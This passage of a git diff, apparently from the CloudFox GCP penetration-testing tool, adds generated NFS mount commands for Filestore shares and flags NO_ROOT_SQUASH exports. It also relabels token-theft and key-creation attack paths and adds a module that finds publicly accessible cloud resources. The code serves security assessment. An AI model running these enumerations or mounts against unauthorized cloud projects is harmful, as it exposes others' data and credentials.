fwBody, - }) - } - output := EndpointsOutput{ - Table: tables, - Loot: lootFiles, + Table: []internal.TableFile{{ + Name: "endpoints", + Header: header, + Body: body, + }}, + Loot: lootFiles, } scopeNames := make([]string, len(m.ProjectIDs)) @@ -1030,7 +1377,7 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge output, ) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "exposure") + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "endpoints") m.CommandCounter.Error++ } } diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go index 23dd7334..724952da 100644 --- a/gcp/commands/filestore.go +++ b/gcp/commands/filestore.go @@ -89,35 +89,117 @@ func (m *FilestoreModule) initializeLootFiles() { } func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceInfo) { + // Determine protocol display name + protocol := instance.Protocol + if protocol == "" { + protocol = "NFS_V3" // Default + } + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( - "# %s (%s)\n"+ - "# Project: %s\n", - instance.Name, instance.Location, + "# ==========================================\n"+ + "# Instance: %s\n"+ + "# ==========================================\n"+ + "# Location: %s\n"+ + "# Project: %s\n"+ + "# Protocol: %s\n"+ + "# Tier: %s\n"+ + "# Network: %s\n"+ + "# IP(s): %s\n\n", + instance.Name, + instance.Location, instance.ProjectID, + protocol, + instance.Tier, + instance.Network, + strings.Join(instance.IPAddresses, ", "), ) - // gcloud command + // gcloud describe command m.LootMap["filestore-commands"].Contents += fmt.Sprintf( - "gcloud filestore instances describe %s --location=%s --project=%s\n", + "# Describe instance:\n"+ + "gcloud filestore instances describe %s --location=%s --project=%s\n\n", instance.Name, instance.Location, instance.ProjectID, ) // Mount commands for each share if len(instance.Shares) > 0 && len(instance.IPAddresses) > 0 { - m.LootMap["filestore-commands"].Contents += "# Mount commands:\n" for _, share := range instance.Shares { + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# Share: %s (%d GB)\n"+ + "# ------------------------------------------\n", + share.Name, share.CapacityGB, + ) + + // Show NFS export options if present + if len(share.NfsExportOptions) > 0 { + m.LootMap["filestore-commands"].Contents += "# NFS Export Options:\n" + for _, opt := range share.NfsExportOptions { + ipRanges := strings.Join(opt.IPRanges, ", ") + if ipRanges == "" { + ipRanges = "all" + } + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# IP Ranges: %s\n"+ + "# Access: %s\n"+ + "# Squash: %s\n", + ipRanges, + opt.AccessMode, + opt.SquashMode, + ) + if opt.SquashMode == "NO_ROOT_SQUASH" { + m.LootMap["filestore-commands"].Contents += "# [!] NO_ROOT_SQUASH - root access preserved!\n" + } + } + m.LootMap["filestore-commands"].Contents += "\n" + } + + // Generate mount commands based on protocol for _, ip := range instance.IPAddresses { + m.LootMap["filestore-commands"].Contents += "# Mount commands (run as root):\n" + + switch protocol { + case "NFS_V4_1": + // NFSv4.1 mount command + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# NFSv4.1 mount:\n"+ + "sudo mkdir -p /mnt/%s\n"+ + "sudo mount -t nfs -o vers=4.1 %s:/%s /mnt/%s\n"+ + "# With Kerberos (if configured):\n"+ + "# sudo mount -t nfs -o vers=4.1,sec=krb5p %s:/%s /mnt/%s\n\n", + share.Name, + ip, share.Name, share.Name, + ip, share.Name, share.Name, + ) + default: // NFS_V3 or empty + // NFSv3 mount command + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# NFSv3 mount:\n"+ + "sudo mkdir -p /mnt/%s\n"+ + "sudo mount -t nfs -o vers=3 %s:/%s /mnt/%s\n\n", + share.Name, + ip, share.Name, share.Name, + ) + } + + // List contents after mounting m.LootMap["filestore-commands"].Contents += fmt.Sprintf( - "# Share: %s (%dGB)\n"+ - "mount -t nfs %s:/%s /mnt/%s\n", - share.Name, share.CapacityGB, - ip, share.Name, share.Name, + "# After mounting, list contents:\n"+ + "ls -la /mnt/%s\n"+ + "# Check disk usage:\n"+ + "df -h /mnt/%s\n\n", + share.Name, share.Name, + ) + + // Unmount command + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# Unmount when done:\n"+ + "sudo umount /mnt/%s\n\n", + share.Name, ) } } } - - m.LootMap["filestore-commands"].Contents += "\n" } func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logger) { @@ -127,17 +209,31 @@ func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logge "Name", "Location", "Tier", + "Protocol", "Network", "IP", "Shares", + "Access", + "Security", "State", } var body [][]string for _, instance := range m.Instances { var shareNames []string + var accessModes []string + hasNoRootSquash := false + for _, share := range instance.Shares { - shareNames = append(shareNames, share.Name) + shareNames = append(shareNames, fmt.Sprintf("%s (%dGB)", share.Name, share.CapacityGB)) + for _, opt := range share.NfsExportOptions { + if opt.AccessMode != "" { + accessModes = append(accessModes, opt.AccessMode) + } + if opt.SquashMode == "NO_ROOT_SQUASH" { + hasNoRootSquash = true + } + } } ip := strings.Join(instance.IPAddresses, ", ") @@ -155,15 +251,43 @@ func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logge network = "-" } + protocol := instance.Protocol + if protocol == "" { + protocol = "NFS_V3" + } + + // Deduplicate and format access modes + access := "-" + if len(accessModes) > 0 { + uniqueAccess := make(map[string]bool) + for _, a := range accessModes { + uniqueAccess[a] = true + } + var accessList []string + for a := range uniqueAccess { + accessList = append(accessList, a) + } + access = strings.Join(accessList, ", ") + } + + // Security findings + security := "OK" + if hasNoRootSquash { + security = "NO_ROOT_SQUASH" + } + body = append(body, []string{ m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Name, instance.Location, instance.Tier, + protocol, network, ip, shares, + access, + security, instance.State, }) } diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index 2484a3a4..53470e9e 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -623,9 +623,9 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal var chainsBody [][]string for _, chain := range m.ImpersonationChains { // Determine action based on exploit command - action := "impersonate (get token)" + action := "Impersonate (Get Token)" if strings.Contains(chain.ExploitCommand, "keys create") { - action = "create key" + action = "Create Key" } chainsBody = append(chainsBody, []string{ @@ -648,17 +648,17 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal var vectorsBody [][]string for _, vector := range m.TokenTheftVectors { - // Map attack vector to action description + // Map attack vector to action description (Title Case) action := vector.AttackVector switch vector.AttackVector { case "metadata_server": - action = "steal token (metadata)" + action = "Steal Token (Metadata)" case "function_execution": - action = "steal token (function)" + action = "Steal Token (Function)" case "container_execution": - action = "steal token (container)" + action = "Steal Token (Container)" case "pod_service_account": - action = "steal token (pod)" + action = "Steal Token (Pod)" } vectorsBody = append(vectorsBody, []string{ diff --git a/gcp/commands/publicaccess.go b/gcp/commands/publicaccess.go new file mode 100644 index 00000000..f1fdb82b --- /dev/null +++ b/gcp/commands/publicaccess.go @@ -0,0 +1,1189 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + kmsservice "github.com/BishopFox/cloudfox/gcp/services/kmsService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + artifactregistry "google.golang.org/api/artifactregistry/v1" + cloudfunctions "google.golang.org/api/cloudfunctions/v2" + compute "google.golang.org/api/compute/v1" + dataflow "google.golang.org/api/dataflow/v1b3" + dataproc "google.golang.org/api/dataproc/v1" + notebooks "google.golang.org/api/notebooks/v1" + run "google.golang.org/api/run/v2" + secretmanager "google.golang.org/api/secretmanager/v1" + sourcerepo "google.golang.org/api/sourcerepo/v1" + storage "google.golang.org/api/storage/v1" +) + +var GCPPublicAccessCommand = &cobra.Command{ + Use: globals.GCP_PUBLICACCESS_MODULE_NAME, + Aliases: []string{"public", "allUsers", "public-resources"}, + Short: "Find resources with allUsers or allAuthenticatedUsers access", + Long: `Enumerate ALL GCP resources that have public access via allUsers or allAuthenticatedUsers. + +This module checks IAM policies on resources across all supported GCP services to identify +resources that are publicly accessible to anyone on the internet. + +Services Checked (16 total): +- Cloud Storage buckets +- BigQuery datasets and tables +- Compute Engine snapshots and images +- Cloud Run services +- Cloud Functions (v2) +- Pub/Sub topics and subscriptions +- Secret Manager secrets +- Artifact Registry repositories +- Cloud KMS crypto keys +- Cloud Spanner instances and databases +- Dataflow jobs +- Dataproc clusters +- Vertex AI Workbench notebooks +- Cloud Source Repositories + +Access Levels: +- allUsers: Anyone on the internet (no authentication required) +- allAuthenticatedUsers: Anyone with a Google account (authenticated) + +Both levels are considered "public" as allAuthenticatedUsers includes ANY Google account, +not just accounts in your organization.`, + Run: runGCPPublicAccessCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type PublicResource struct { + ResourceType string // Service type (Storage, BigQuery, etc.) + ResourceName string // Resource identifier + ProjectID string // Project containing the resource + Location string // Region/zone if applicable + AccessLevel string // allUsers or allAuthenticatedUsers + Role string // IAM role granted publicly + Size string // Size if applicable + AdditionalInfo string // Extra context +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PublicAccessModule struct { + gcpinternal.BaseGCPModule + + PublicResources []PublicResource + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PublicAccessOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PublicAccessOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PublicAccessOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPublicAccessCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PUBLICACCESS_MODULE_NAME) + if err != nil { + return + } + + module := &PublicAccessModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + PublicResources: []PublicResource{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PublicAccessModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating public resources (allUsers/allAuthenticatedUsers)...", globals.GCP_PUBLICACCESS_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBLICACCESS_MODULE_NAME, m.processProject) + + if len(m.PublicResources) == 0 { + logger.InfoM("No public resources found", globals.GCP_PUBLICACCESS_MODULE_NAME) + return + } + + // Count by access level + allUsersCount := 0 + allAuthCount := 0 + for _, r := range m.PublicResources { + if r.AccessLevel == "allUsers" { + allUsersCount++ + } else { + allAuthCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d public resource(s): %d allUsers, %d allAuthenticatedUsers", + len(m.PublicResources), allUsersCount, allAuthCount), globals.GCP_PUBLICACCESS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PublicAccessModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking public access in project: %s", projectID), globals.GCP_PUBLICACCESS_MODULE_NAME) + } + + // Check all services in parallel + var wg sync.WaitGroup + + // 1. Cloud Storage buckets + wg.Add(1) + go func() { + defer wg.Done() + m.checkStorageBuckets(ctx, projectID, logger) + }() + + // 2. Compute Engine snapshots + wg.Add(1) + go func() { + defer wg.Done() + m.checkComputeSnapshots(ctx, projectID, logger) + }() + + // 3. Compute Engine images + wg.Add(1) + go func() { + defer wg.Done() + m.checkComputeImages(ctx, projectID, logger) + }() + + // 4. BigQuery datasets + wg.Add(1) + go func() { + defer wg.Done() + m.checkBigQueryDatasets(ctx, projectID, logger) + }() + + // 5. Cloud Run services + wg.Add(1) + go func() { + defer wg.Done() + m.checkCloudRunServices(ctx, projectID, logger) + }() + + // 6. Cloud Functions + wg.Add(1) + go func() { + defer wg.Done() + m.checkCloudFunctions(ctx, projectID, logger) + }() + + // 7. Pub/Sub topics + wg.Add(1) + go func() { + defer wg.Done() + m.checkPubSubTopics(ctx, projectID, logger) + }() + + // 8. Pub/Sub subscriptions + wg.Add(1) + go func() { + defer wg.Done() + m.checkPubSubSubscriptions(ctx, projectID, logger) + }() + + // 9. Secret Manager secrets + wg.Add(1) + go func() { + defer wg.Done() + m.checkSecretManagerSecrets(ctx, projectID, logger) + }() + + // 10. Artifact Registry repositories + wg.Add(1) + go func() { + defer wg.Done() + m.checkArtifactRegistry(ctx, projectID, logger) + }() + + // 11. Cloud KMS keys + wg.Add(1) + go func() { + defer wg.Done() + m.checkKMSKeys(ctx, projectID, logger) + }() + + // 12. Cloud Spanner instances/databases + wg.Add(1) + go func() { + defer wg.Done() + m.checkSpanner(ctx, projectID, logger) + }() + + // 13. Dataflow jobs + wg.Add(1) + go func() { + defer wg.Done() + m.checkDataflowJobs(ctx, projectID, logger) + }() + + // 14. Dataproc clusters + wg.Add(1) + go func() { + defer wg.Done() + m.checkDataprocClusters(ctx, projectID, logger) + }() + + // 15. Vertex AI Workbench (Notebooks) + wg.Add(1) + go func() { + defer wg.Done() + m.checkNotebooks(ctx, projectID, logger) + }() + + // 16. Source Repositories + wg.Add(1) + go func() { + defer wg.Done() + m.checkSourceRepos(ctx, projectID, logger) + }() + + wg.Wait() +} + +// checkStorageBuckets checks Cloud Storage buckets for public access +func (m *PublicAccessModule) checkStorageBuckets(ctx context.Context, projectID string, logger internal.Logger) { + storageService, err := storage.NewService(ctx) + if err != nil { + return + } + + resp, err := storageService.Buckets.List(projectID).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list buckets in project %s", projectID)) + return + } + + for _, bucket := range resp.Items { + policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + resource := PublicResource{ + ResourceType: "Cloud Storage", + ResourceName: bucket.Name, + ProjectID: projectID, + Location: bucket.Location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Storage class: %s", bucket.StorageClass), + } + m.addResource(resource) + } + } + } + } +} + +// checkComputeSnapshots checks Compute Engine snapshots for public access +func (m *PublicAccessModule) checkComputeSnapshots(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Snapshots.List(projectID) + err = req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + resource := PublicResource{ + ResourceType: "Compute Snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + Size: fmt.Sprintf("%d GB", snapshot.DiskSizeGb), + AdditionalInfo: fmt.Sprintf("Source disk: %s", publicAccessExtractResourceName(snapshot.SourceDisk)), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list snapshots in project %s", projectID)) + } +} + +// checkComputeImages checks Compute Engine images for public access +func (m *PublicAccessModule) checkComputeImages(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Images.List(projectID) + err = req.Pages(ctx, func(page *compute.ImageList) error { + for _, image := range page.Items { + policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + resource := PublicResource{ + ResourceType: "Compute Image", + ResourceName: image.Name, + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + Size: fmt.Sprintf("%d GB", image.DiskSizeGb), + AdditionalInfo: fmt.Sprintf("Family: %s", image.Family), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list images in project %s", projectID)) + } +} + +// checkBigQueryDatasets checks BigQuery datasets for public access +func (m *PublicAccessModule) checkBigQueryDatasets(ctx context.Context, projectID string, logger internal.Logger) { + bq := bigqueryservice.New() + datasets, err := bq.BigqueryDatasets(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list BigQuery datasets in project %s", projectID)) + return + } + + for _, dataset := range datasets { + if dataset.IsPublic { + resource := PublicResource{ + ResourceType: "BigQuery Dataset", + ResourceName: dataset.DatasetID, + ProjectID: projectID, + Location: dataset.Location, + AccessLevel: dataset.PublicAccess, + Role: "Dataset Access", + AdditionalInfo: fmt.Sprintf("Encryption: %s", dataset.EncryptionType), + } + m.addResource(resource) + } + } + + // Also check individual tables + for _, dataset := range datasets { + tables, err := bq.BigqueryTables(projectID, dataset.DatasetID) + if err != nil { + continue + } + + for _, table := range tables { + if table.IsPublic { + resource := PublicResource{ + ResourceType: "BigQuery Table", + ResourceName: fmt.Sprintf("%s.%s", dataset.DatasetID, table.TableID), + ProjectID: projectID, + Location: table.Location, + AccessLevel: table.PublicAccess, + Role: "Table Access", + Size: publicAccessFormatBytes(table.NumBytes), + AdditionalInfo: fmt.Sprintf("Rows: %d, Type: %s", table.NumRows, table.TableType), + } + m.addResource(resource) + } + } + } +} + +// checkCloudRunServices checks Cloud Run services for public access +func (m *PublicAccessModule) checkCloudRunServices(ctx context.Context, projectID string, logger internal.Logger) { + runService, err := run.NewService(ctx) + if err != nil { + return + } + + // List all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := runService.Projects.Locations.Services.List(parent) + err = req.Pages(ctx, func(page *run.GoogleCloudRunV2ListServicesResponse) error { + for _, svc := range page.Services { + // Get IAM policy + resource := svc.Name + policy, err := runService.Projects.Locations.Services.GetIamPolicy(resource).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + serviceName := publicAccessExtractResourceName(svc.Name) + location := publicAccessExtractLocation(svc.Name) + res := PublicResource{ + ResourceType: "Cloud Run", + ResourceName: serviceName, + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("URL: %s", svc.Uri), + } + m.addResource(res) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Cloud Run services in project %s", projectID)) + } +} + +// checkCloudFunctions checks Cloud Functions for public access +func (m *PublicAccessModule) checkCloudFunctions(ctx context.Context, projectID string, logger internal.Logger) { + cfService, err := cloudfunctions.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := cfService.Projects.Locations.Functions.List(parent) + err = req.Pages(ctx, func(page *cloudfunctions.ListFunctionsResponse) error { + for _, fn := range page.Functions { + // Get IAM policy + policy, err := cfService.Projects.Locations.Functions.GetIamPolicy(fn.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + funcName := publicAccessExtractResourceName(fn.Name) + location := publicAccessExtractLocation(fn.Name) + + // Get URL + url := "" + if fn.ServiceConfig != nil { + url = fn.ServiceConfig.Uri + } + + resource := PublicResource{ + ResourceType: "Cloud Function", + ResourceName: funcName, + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("URL: %s, Runtime: %s", url, fn.BuildConfig.Runtime), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Cloud Functions in project %s", projectID)) + } +} + +// checkPubSubTopics checks Pub/Sub topics for public access +func (m *PublicAccessModule) checkPubSubTopics(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + topics, err := ps.Topics(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Pub/Sub topics in project %s", projectID)) + return + } + + for _, topic := range topics { + for _, binding := range topic.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + resource := PublicResource{ + ResourceType: "Pub/Sub Topic", + ResourceName: topic.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Subscriptions: %d", topic.SubscriptionCount), + } + m.addResource(resource) + } + } + } +} + +// checkPubSubSubscriptions checks Pub/Sub subscriptions for public access +func (m *PublicAccessModule) checkPubSubSubscriptions(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subs, err := ps.Subscriptions(projectID) + if err != nil { + return + } + + for _, sub := range subs { + for _, binding := range sub.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + resource := PublicResource{ + ResourceType: "Pub/Sub Subscription", + ResourceName: sub.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Topic: %s", sub.Topic), + } + m.addResource(resource) + } + } + } +} + +// checkSecretManagerSecrets checks Secret Manager secrets for public access +func (m *PublicAccessModule) checkSecretManagerSecrets(ctx context.Context, projectID string, logger internal.Logger) { + smService, err := secretmanager.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s", projectID) + req := smService.Projects.Secrets.List(parent) + err = req.Pages(ctx, func(page *secretmanager.ListSecretsResponse) error { + for _, secret := range page.Secrets { + // Get IAM policy + policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + secretName := publicAccessExtractResourceName(secret.Name) + resource := PublicResource{ + ResourceType: "Secret Manager", + ResourceName: secretName, + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Replication: %v", secret.Replication), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list secrets in project %s", projectID)) + } +} + +// checkArtifactRegistry checks Artifact Registry repositories for public access +func (m *PublicAccessModule) checkArtifactRegistry(ctx context.Context, projectID string, logger internal.Logger) { + arService, err := artifactregistry.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := arService.Projects.Locations.Repositories.List(parent) + err = req.Pages(ctx, func(page *artifactregistry.ListRepositoriesResponse) error { + for _, repo := range page.Repositories { + // Get IAM policy + policy, err := arService.Projects.Locations.Repositories.GetIamPolicy(repo.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + repoName := publicAccessExtractResourceName(repo.Name) + location := publicAccessExtractLocation(repo.Name) + resource := PublicResource{ + ResourceType: "Artifact Registry", + ResourceName: repoName, + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Format: %s", repo.Format), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Artifact Registry repos in project %s", projectID)) + } +} + +// checkKMSKeys checks Cloud KMS keys for public access +func (m *PublicAccessModule) checkKMSKeys(ctx context.Context, projectID string, logger internal.Logger) { + kmsSvc := kmsservice.New() + keys, err := kmsSvc.CryptoKeys(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list KMS keys in project %s", projectID)) + return + } + + for _, key := range keys { + for _, binding := range key.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + resource := PublicResource{ + ResourceType: "Cloud KMS", + ResourceName: key.Name, + ProjectID: projectID, + Location: key.Location, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("KeyRing: %s, Purpose: %s, Protection: %s", key.KeyRing, key.Purpose, key.ProtectionLevel), + } + m.addResource(resource) + } + } + } +} + +// checkSpanner checks Cloud Spanner instances/databases for public access +func (m *PublicAccessModule) checkSpanner(ctx context.Context, projectID string, logger internal.Logger) { + spannerSvc := spannerservice.New() + result, err := spannerSvc.ListInstancesAndDatabases(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Spanner in project %s", projectID)) + return + } + + // Check instances + for _, instance := range result.Instances { + for _, binding := range instance.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + resource := PublicResource{ + ResourceType: "Spanner Instance", + ResourceName: instance.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Config: %s, Nodes: %d", instance.Config, instance.NodeCount), + } + m.addResource(resource) + } + } + } + + // Check databases + for _, db := range result.Databases { + for _, binding := range db.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + resource := PublicResource{ + ResourceType: "Spanner Database", + ResourceName: db.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Instance: %s, Encryption: %s", db.InstanceName, db.EncryptionType), + } + m.addResource(resource) + } + } + } +} + +// checkDataflowJobs checks Dataflow jobs for public IAM access +func (m *PublicAccessModule) checkDataflowJobs(ctx context.Context, projectID string, logger internal.Logger) { + dfService, err := dataflow.NewService(ctx) + if err != nil { + return + } + + // List jobs across all regions + req := dfService.Projects.Jobs.List(projectID) + err = req.Pages(ctx, func(page *dataflow.ListJobsResponse) error { + for _, job := range page.Jobs { + // Get IAM policy for job (requires aggregated) + // Note: Dataflow jobs don't have direct IAM policies, but we check job type + // Jobs reading from public sources can be a concern + if job.Type == "JOB_TYPE_STREAMING" || job.Type == "JOB_TYPE_BATCH" { + // Check if job has public-facing inputs (like Pub/Sub with allUsers) + // This is informational - jobs themselves don't have IAM + // but we flag them if they have concerning configurations + if hasPublicDataflowConfig(job) { + resource := PublicResource{ + ResourceType: "Dataflow Job", + ResourceName: job.Name, + ProjectID: projectID, + Location: job.Location, + AccessLevel: "allUsers", // Indicates public source/sink + Role: "dataflow.worker", + AdditionalInfo: fmt.Sprintf("Type: %s, State: %s", job.Type, job.CurrentState), + } + m.addResource(resource) + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Dataflow jobs in project %s", projectID)) + } +} + +// hasPublicDataflowConfig checks if a Dataflow job has public-facing configurations +func hasPublicDataflowConfig(job *dataflow.Job) bool { + // Check job labels for signs of public data sources + if job.Labels != nil { + for key, value := range job.Labels { + if strings.Contains(strings.ToLower(key), "public") || + strings.Contains(strings.ToLower(value), "public") { + return true + } + } + } + // In practice, need to check the pipeline options for public sources + // This is a placeholder - full implementation would parse job graph + return false +} + +// checkDataprocClusters checks Dataproc clusters for public access +func (m *PublicAccessModule) checkDataprocClusters(ctx context.Context, projectID string, logger internal.Logger) { + dpService, err := dataproc.NewService(ctx) + if err != nil { + return + } + + // List clusters in all regions + regions := []string{"us-central1", "us-east1", "us-west1", "europe-west1", "asia-east1", "global"} + for _, region := range regions { + parent := fmt.Sprintf("projects/%s/regions/%s", projectID, region) + req := dpService.Projects.Regions.Clusters.List(projectID, region) + err := req.Pages(ctx, func(page *dataproc.ListClustersResponse) error { + for _, cluster := range page.Clusters { + // Get IAM policy for cluster + policyReq := &dataproc.GetIamPolicyRequest{} + policy, err := dpService.Projects.Regions.Clusters.GetIamPolicy(parent+"/clusters/"+cluster.ClusterName, policyReq).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + resource := PublicResource{ + ResourceType: "Dataproc Cluster", + ResourceName: cluster.ClusterName, + ProjectID: projectID, + Location: region, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Status: %s", cluster.Status.State), + } + m.addResource(resource) + } + } + } + } + return nil + }) + if err != nil { + // Don't fail on region errors, continue + continue + } + } +} + +// checkNotebooks checks Vertex AI Workbench notebooks for public access +func (m *PublicAccessModule) checkNotebooks(ctx context.Context, projectID string, logger internal.Logger) { + nbService, err := notebooks.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := nbService.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, 